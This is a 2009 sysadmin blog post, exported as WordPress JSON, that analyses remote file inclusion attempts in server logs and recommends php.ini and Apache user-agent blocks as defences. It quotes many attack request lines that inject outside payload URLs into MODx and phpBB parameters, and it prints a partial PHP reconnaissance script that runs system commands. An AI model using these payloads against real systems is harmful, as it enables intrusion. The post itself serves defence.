{"id":158,"date":"2009-04-09T22:23:52","date_gmt":"2009-04-09T14:23:52","guid":{"rendered":"http:\/\/www.computersolutions.cn\/blog\/?p=158"},"modified":"2010-05-11T13:57:48","modified_gmt":"2010-05-11T05:57:48","slug":"hacker-attacks-on-the-rise","status":"publish","type":"post","link":"https:\/\/www.computersolutions.cn\/blog\/2009\/04\/hacker-attacks-on-the-rise\/","title":{"rendered":"Hacker attacks on the rise (Its those damn American’s mostly, attacking us poor Chinese users)"},"content":{"rendered":"

I’ve noticed a lot more hacker attacks in the logs for the servers we maintain recently.
\nThis is probably due to more people using Botnets for attack scan’s.<\/p>\n

What are the hackers looking for, and how can we prevent them getting in?<\/strong><\/p>\n

In most cases, the hackers are looking for vulnerabilities in common applications.\u00a0 The most notorious of these would be things like PHPBB, WordPress, and other similar apps.\u00a0 The most common attacks we are noticing these days are ones that leverage remote inclusion of files.
\n
\nIf I grab a couple of examples from the logs, you can see how they work:<\/p>\n

195.74.61.78 – – [05\/Apr\/2009:01:25:59 +0800] “GET \/en\/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [05\/Apr\/2009:01:25:59 +0800] “GET \/en\/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [05\/Apr\/2009:01:26:01 +0800] “GET \/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 200 628 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [05\/Apr\/2009:01:26:01 +0800] “GET \/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:09:39 +0800] “GET \/\/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:09:45 +0800] “GET \/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:15:02 +0800] “GET \/en\/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:15:03 +0800] “GET \/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:22:34 +0800] “GET \/\/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 200 628 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:22:35 +0800] “GET \/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 200 628 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:23:39 +0800] “GET \/en\/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.chattymamas.com\/forum\/impex\/fx29id1.txt?? HTTP\/1.1” 404 4442 “-” “Mozilla\/5.0”
\n195.74.61.78 – – [07\/Apr\/2009:18:23:39 +0800] “GET \/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.chattymamas.com\/forum\/impex\/fx29id1.txt?? HTTP\/1.1” 404 4442 “-” “Mozilla\/5.0”
\n195.74.61.78 – – [07\/Apr\/2009:18:23:39 +0800] “GET \/en\/Support\/\/assets\/snippets\/reflect\/errors.php?error=http:\/\/www.chattymamas.com\/forum\/impex\/fx29id1.txt?? HTTP\/1.1” 404 4442 “-” “Mozilla\/5.0”
\n195.74.61.78 – – [07\/Apr\/2009:18:27:12 +0800] “GET \/en\/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 404 4442 “-” “libwww-perl\/5.808”
\n195.74.61.78 – – [07\/Apr\/2009:18:27:13 +0800] “GET \/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt? HTTP\/1.1” 200 628 “-” “libwww-perl\/5.808”<\/h5>\n

In the example above, the attacker is leveraging a vulnerability in MODx (a popular CMS that we use) to try to load a remote file.\u00a0 What will happen is that this file will hopefully (for the hacker) get loaded from the remote server, and executed or placed into somewhere on our server, so that they can run it.<\/p>\n

As we have logs for the attempts, I can also see where the attackers are coming from.\u00a0 In this case, its Turkey, and the ip space is owned by a company called Gradwell.net (who I’ve notified).<\/p>\n

The code that they’re trying to include is this:<\/p>\n

= 4 && $len <=6) {\r\n        return sprintf(\"%0.2f Kb\", $number\/1024);\r\n    }\r\n    if($len >= 7 && $len <=9) {\r\n        return sprintf(\"%0.2f Mb\", $number\/1024\/1024);\r\n    }\r\n    return sprintf(\"%0.2f Gb\", $number\/1024\/1024\/1024);\r\n}                          \r\n\r\necho \"Coracore\r\n\";\r\n$un = @php_uname();\r\n$id1 = system(id);\r\n$pwd1 = @getcwd();\r\n$free1= diskfreespace($pwd1);\r\n$free = ConvertBytes(diskfreespace($pwd1));\r\nif (!$free) {\r\n    $free = 0;\r\n}\r\n$all1= disk_total_space($pwd1);\r\n$all = ConvertBytes(disk_total_space($pwd1));\r\nif (!$all) {\r\n    $all = 0;\r\n}\r\n$used = ConvertBytes($all1-$free1);\r\n$os = @PHP_OS;\r\n\r\necho \"Coracore\r\n\";\r\necho \"uname -a: $un\r\n\";\r\necho \"os: $os\r\n\";\r\necho \"id: $id1\r\n\";\r\necho \"free: $free\r\n\";\r\necho \"used: $used\r\n\";\r\necho \"total: $all\r\n\";\r\nexit;<\/pre>\n
The code doesn’t appear to be too harmful for the initial run, it appears that they try to find out more about the system – which is what the script does.<\/p>\n
So, the easiest thing to do to stop these type of attacks is to disallow remote inclusion.<\/p>\n
If we check our php.ini file (typically \/etc\/php5\/apache2\/php.ini ) for php5\/apache2 users in Debian, we see a couple of settings that are interesting.<\/p>\n
; Whether to allow the treatment of URLs (like http:\/\/ or ftp:\/\/) as files.
\nallow_url_fopen = Off<\/p>\n
; Whether to allow include\/require to open URLs (like http:\/\/ or ftp:\/\/) as files.
\nallow_url_include = Off<\/p><\/blockquote>\n
In my setup above, I’ve disallowed url_fopen, and url_include (which are what the attacks are using to get their stuff on our server).
\nThis simple step will block most remote inclusion attacks.<\/p>\n
I’ll show another couple of attacks from our log files below:<\/p>\n
nk210-203-73-105.adsl.static.apol.com.tw – – [18\/May\/2008:05:40:27 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/ieras.ru\/tmp\/nid.txt? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.65”
\nc2.33.1343.static.theplanet.com – – [19\/May\/2008:05:23:43 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/ieras.ru\/tmp\/mid.txt? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.79”
\n92.f0.354a.static.theplanet.com – – [29\/May\/2008:04:59:23 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/ieras.ru\/tmp\/mid.txt? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.79”
\ndime68.dizinc.com – – [10\/Jun\/2008:22:18:45 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/193.253.223.43\/tmp\/trem\/oldbisok?? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.811”
\ndime68.dizinc.com – – [10\/Jun\/2008:23:41:16 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/193.253.223.43\/tmp\/trem\/oldbisok?? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.811”
\ndime68.dizinc.com – – [11\/Jun\/2008:02:48:31 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/193.253.223.43\/tmp\/trem\/oldbisok?? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.811”
\nv8.emzwo.de – – [25\/Jul\/2008:03:31:17 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/212.11.127.86\/tmp\/trem\/1? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.805”
\nv8.emzwo.de – – [25\/Jul\/2008:03:36:39 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/212.11.127.86\/tmp\/trem\/oldbisok?? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.805”
\nv8.emzwo.de – – [25\/Jul\/2008:04:06:31 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=ftp:\/\/212.11.127.86\/tmp\/trem\/oldbisok?? HTTP\/1.1” 200 5157 “-” “libwww-perl\/5.805”
\n85.230.115.32 – – [15\/Sep\/2008:07:35:26 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/memex.c3.hu\/~tata\/limesurvey\/tmp\/alb?? HTTP\/1.1” 200 4981 “-” “libwww-perl\/5.79”
\n85.230.115.32 – – [15\/Sep\/2008:07:35:41 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/memex.c3.hu\/~tata\/limesurvey\/tmp\/alb?? HTTP\/1.1” 200 4981 “-” “libwww-perl\/5.79”
\n85.230.115.32 – – [15\/Sep\/2008:07:36:18 +0800] “GET \/\/index.php?_SERVER[DOCUMENT_ROOT]=http:\/\/memex.c3.hu\/~tata\/limesurvey\/tmp\/alb?? HTTP\/1.1” 200 4981 “-” “libwww-perl\/5.79”
\n218.106.254.18 – – [27\/Mar\/2009:19:45:24 +0800] “GET \/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 350 “-” “libwww-perl\/5.79”
\n218.106.254.18 – – [27\/Mar\/2009:19:45:24 +0800] “GET \/blog\/2009\/03\/fake-100rmb-notes-in-circulation-again\/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 11664 “-” “libwww-perl\/5.79”
\n69.64.34.249 – – [27\/Mar\/2009:19:50:47 +0800] “GET \/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 350 “-” “libwww-perl\/5.805”
\n69.64.34.249 – – [27\/Mar\/2009:19:50:47 +0800] “GET \/blog\/2009\/03\/fake-100rmb-notes-in-circulation-again%20\/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 11664 “-” “libwww-perl\/5.805”
\n69.64.34.249 – – [27\/Mar\/2009:19:50:58 +0800] “GET \/blog\/2009\/03\/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 11664 “-” “libwww-perl\/5.805”
\n218.106.254.18 – – [27\/Mar\/2009:20:05:04 +0800] “GET \/blog\/2009\/03\/fake-100rmb-notes-in-circulation-again%20\/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 11664 “-” “libwww-perl\/5.79”
\n218.106.254.18 – – [27\/Mar\/2009:20:05:07 +0800] “GET \/blog\/2009\/03\/modules\/MDForum\/includes\/functions_admin.php?phpbb_root_path=http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt??? HTTP\/1.1” 404 11664 “-” “libwww-perl\/5.79”
\n8.6.221.82 – – [06\/Apr\/2009:18:16:39 +0800] “GET \/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.neskan.cz\/tmp\/copyright.txt? HTTP\/1.1” 200 628 “-” “Mozilla\/5.0”
\n8.6.221.82 – – [06\/Apr\/2009:18:16:39 +0800] “GET \/en\/Support\/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.neskan.cz\/tmp\/copyright.txt? HTTP\/1.1” 404 4442 “-” “Mozilla\/5.0”
\n8.6.221.82 – – [06\/Apr\/2009:18:16:42 +0800] “GET \/en\/\/assets\/snippets\/reflect\/snippet.reflect.php?reflect_base=http:\/\/www.neskan.cz\/tmp\/copyright.txt? HTTP\/1.1” 404 4442 “-” “Mozilla\/5.0”<\/h6>\n
You’ll notice that most of them do the same kind of things – attempts to include remote files.\u00a0 As of writing, some of the servers linked to have been cleaned up, but some haven’t.
\nThe ip addresses on the left are where the attacker is coming in from.\u00a0\u00a0 Generally this indicates that the computer at that address has been compromised.<\/p>\n
I usually try to contact the companies where possible, but usually I get responses which aren’t very helpful, or their mail bounces.\u00a0 Both no-no’s in my book!<\/p>\n
If I check the last line in the logs -8.6.221.82, there are a number of tools I can use to find out more info about that ip address.<\/p>\n
In this case, I did a quick whois of the address, and got this:<\/p>\n
whois 8.6.221.82
\nLevel 3 Communications, Inc. LVLT-ORG-8-8 (NET-8-0-0-0-1)
\n8.0.0.0 – 8.255.255.255
\nHostway Corporation LVLT-HSWY-8-6-220 (NET-8-6-220-0-1)
\n8.6.220.0 – 8.6.223.255<\/p>\n
The server also has reverse dns (not all do).<\/p><\/blockquote>\n
nslookup 8.6.221.82
\nServer:\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0127.0.0.1
\nAddress:\u00a0\u00a0 \u00a0127.0.0.1#53<\/p>\n
Non-authoritative answer:
\n82.221.6.8.in-addr.arpa\u00a0\u00a0 \u00a0name = server3.clanpimp.net.<\/p><\/blockquote>\n
So I can see that the attacker is coming in from US address space (those cheeky american’s always complain about Chinese attacking them, but we never get to complain about American’s attacking us…), and they are from something called server3.clanpimp.net<\/p>\n
Its actually more important to try to clear out the servers serving up the vulnerabilities, as more computers can be made safer that way.<\/p>\n
If we check to see who owns the www.vampires-fifa-liga.de domain ( remember the remote file trying to get included was here -http:\/\/www.vampires-fifa-liga.de\/twomichael\/tmp\/release.txt), you’ll see that its…\u00a0\u00a0 Level 3.<\/p>\n
dig www.vampires-fifa-liga.de<\/p>\n
; <<>> DiG 9.3.4-P1.1 <<>> www.vampires-fifa-liga.de
\n;; global options:\u00a0 printcmd
\n;; Got answer:
\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35558
\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0<\/p>\n
;; QUESTION SECTION:
\n;www.vampires-fifa-liga.de.\u00a0\u00a0\u00a0 IN\u00a0\u00a0\u00a0 A<\/p>\n
;; ANSWER SECTION:
\nwww.vampires-fifa-liga.de. 86400 IN\u00a0\u00a0\u00a0 A\u00a0\u00a0\u00a0 62.67.235.162<\/p>\n
whois 62.67.235.162
\n% This is the RIPE Whois query server #3.
\n% The objects are in RPSL format.
\n%
\n% Rights restricted by copyright.
\n% See http:\/\/www.ripe.net\/db\/copyright.html<\/p>\n
% Note: This output has been filtered.
\n%\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 To receive output for a database update, use the “-B” flag.<\/p>\n
% Information related to ‘62.67.235.0 – 62.67.235.255’<\/p>\n
inetnum:\u00a0\u00a0\u00a0\u00a0\u00a0 62.67.235.0 – 62.67.235.255
\nnetname:\u00a0\u00a0\u00a0\u00a0\u00a0 EVANZO-DE
\ndescr:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 EVANZO-DE
\ncountry:\u00a0\u00a0\u00a0\u00a0\u00a0 de
\nadmin-c:\u00a0\u00a0\u00a0\u00a0\u00a0 EDME2-RIPE
\ntech-c:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LTHM
\nstatus:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ASSIGNED PA
\nremarks:\u00a0\u00a0\u00a0\u00a0\u00a0 all abuse reports to abuse@level3.com
\nmnt-by:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LEVEL3-MNT
\nmnt-lower:\u00a0\u00a0\u00a0 LEVEL3-MNT
\nsource:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 RIPE # Filtered<\/p><\/blockquote>\n
Color me unsuprised.\u00a0 (I’ve covered Level 3 in previous posts about this kind of thing…)<\/p>\n
As the other hacked server providing remote php inclusion files Kortech.cn (http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt)\u00a0  is in our local area, I can give them an email and see if they respond.
\nIf they don’t I can also call them – they’re Shanghai based.
\nCurrently they’re serving up the following:<\/p>\n
http:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/logi.txt
\nhttp:\/\/www.kortech.cn\/bbs\/\/skin\/zero_vote\/oltre.txt<\/p><\/blockquote>\n
Will be interesting to see if the people there will listen or not!<\/p>\n
Its actually in their own interest to clear up the infection -currently their server is getting loaded with requests for that file.<\/p>\n
A search for that filename will reveal how extensively they’re getting slammed:<\/p>\n
http:\/\/search.yahoo.com\/search?p=http%3A%2F%2Fwww.kortech.cn%2Fbbs%2F%2Fskin%2Fzero_vote%2Flogi.txt&ei=UTF-8&fr=moz2<\/a><\/p>\n
Another thing to look at is who the bots claim to be when they connect to the server.\u00a0 The observant amongst you will have noticed that most of the connections are coming from libwww-perl\/someversion<\/p>\n
This is something we can also protect against.\u00a0 If I check my logs, I notice that zero legitimate connections use libwww-perl, but 100% of hack attempts use it.
\nWhat does that mean?
\nIts another easy way to block these kind of attempts.<\/p>\n
If I add this to my apache2.conf for a server, I can block libwww-perl, and other bad User-Agents from accessing my site, and wasting my bandwidth.<\/p>\n
\n
SetEnvIfNoCase User-Agent \"^Wget\" bad_bot\r\nSetEnvIfNoCase User-Agent \"^EmailSiphon\" bad_bot\r\nSetEnvIfNoCase User-Agent \"^EmailWolf\" bad_bot\r\nSetEnvIfNoCase User-Agent \"^libwww-perl\" bad_bot\r\n\r\n<Location \/>\r\n    Order allow,deny\r\n    Allow from all\r\n    Deny from env=bad_bot\r\n<\/Location><\/pre>\n<\/blockquote>\n
Simple, and easy!
\nThis doesn’t stop attacks from other user-agents, but as most of the current ones appear to be using libwww-perl extensively, it gives us a bit more protection until the blackhats change their methods.  At least this stops the script kiddies!<\/p>\n","protected":false},"excerpt":{"rendered":"
I’ve noticed a lot more hacker attacks in the logs for the servers we maintain recently. This is probably due to more people using Botnets for attack scan’s. What are the hackers looking for, and how can we prevent them getting in? In most cases, the hackers are looking for vulnerabilities in common applications.\u00a0 The […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[25],"tags":[47],"class_list":["post-158","post","type-post","status-publish","format-standard","hentry","category-technical-mumbo-jumbo","tag-hackers"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/158","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/comments?post=158"}],"version-history":[{"count":15,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/158\/revisions"}],"predecessor-version":[{"id":520,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/158\/revisions\/520"}],"wp:attachment":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/media?parent=158"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/categories?post=158"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/tags?post=158"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}